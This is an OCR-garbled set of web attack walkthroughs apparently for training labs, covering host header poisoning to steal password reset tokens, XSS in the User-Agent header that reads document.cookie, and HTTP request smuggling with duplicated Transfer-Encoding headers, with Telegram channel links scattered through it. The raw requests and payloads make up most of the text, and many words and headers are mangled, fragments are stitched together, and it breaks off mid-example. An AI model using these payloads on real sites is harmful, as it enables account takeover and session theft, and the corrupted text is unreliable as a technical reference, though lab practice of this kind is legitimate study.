Stage 1 Example 1 Host Header Poisoning Go to forgot password page and enter carlos as username. Intercept the request and change the host header to exploit server URL. Hex \n 1 POST /forgot_password HTTP/1.1 2 Host: . web-security-acailemy net 2 Content-Length: $2 Cache-Control: max-age=' jecChellas "Mot AsBrand! Check the access log and you will receive a password reset token, /rasources/js/tracking.js HTTP/1.1" 424 "User-Agent: Mozilla/5.0 (Windows NT 18 /forgot-password? tenp-forgot-password-token=sn {i 1 /log HITP/1.1" 208 “User-Agent: Mozilla/5.@ (Windows NT 19.03 Win64; x64) Apple https://t.me/offenciveSecExample 2 XSS via HTTP Request Smuggling Select one of the posts and modify the User-Agent header to confirm if there is alert pop up. Upgeade-Insecure Requests: 1 User-Agent: ">alert (document. coolrie) ; Accept. Send the following request to intruder and send it with null payloads for about 100 times. POST /?USSK=1059000963 HTTP/1.1 Host: Cookie: _lab=; session; _lab_analytics= Cache-Control: max-age=0 See-Ch-Ua: "Chromium"v="95", ";Not A Brand;v="93" Sec-Ch-Ua-Mobile: 70 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10. Chrome/95.0.4638.69 Safari/537.36 Accept: text/html application/xhtml+xml,application/xml;q=0.9,image/avif image/webp,image/apng,*/*;q= 8,application/signed-exchange;v=b3; Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: ‘Accept-Encoding: gzip, deflate ‘Accept-Language: en-US,en;q=0.9 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked Transfer-Encoding: ORHFKSuL Content-Length: 25 fin64; x64) AppleWebkit/S37.36 (KHTML, like Gecko) f du60v=x&h94ed=x 0 GET /post?postid=1 HTTP/1.1 Host: User-Agent: "> https://t.me/offenciveSec.Example 3 XSS ?searchterm=">